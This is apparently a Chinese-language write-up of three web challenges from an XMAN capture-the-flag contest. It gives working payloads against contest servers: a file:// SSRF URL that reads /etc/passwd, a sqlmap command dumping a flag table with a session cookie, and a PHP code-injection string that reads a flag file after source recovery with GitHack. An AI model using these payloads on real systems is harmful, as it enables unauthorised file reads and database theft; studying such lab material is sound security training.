XMAN -个人排位赛 WEB-WRITEup
Simple SSRF
+ 备注:curl + # 截断
-
首先在输入框输入发现只能输入www.baidu.com这个域名并测试出用井号(%23)可以进行截断
-
于是测试用file:// 尝试读取本地文件
-
http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/passwd%23
发现可以读取成功
ssrf1.png
(容我真的没有想到flag会在etc/flag.txt)
ssrf2.pngview-source:http://202.112.51.184:11080/?submit=%CC%E1%BD%BB%B2%E9%D1%AF&site=file://www.baidu.com/etc/flag.txt%23
bbsqli
直接放到sqlmap中跑出结果
c:/python27/python.exe sqlmap.py -u "http://202.112.51.184:16080" --cookie "PHPSESSID=56a230bad525bab2c441cb1f64d7106e" --level 2 -D sqli -T [GDJM_flag] -C flag --dump
bbsqli.png
flag:xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}
makeit
-
首先看到
makeit1.pnghttp://202.112.51.184:15080/?page=about
中有I used Git
于是直接Githack index.php
makeit2.png构造
page=1') or print_r(file_get_contents('templates/flag.php'));//
makeit3.pngview-source:http://202.112.51.184:15080/?page=1') or print_r(file_get_contents('templates/flag.php'));//
XMAN{flag_is_so_cool}
网友评论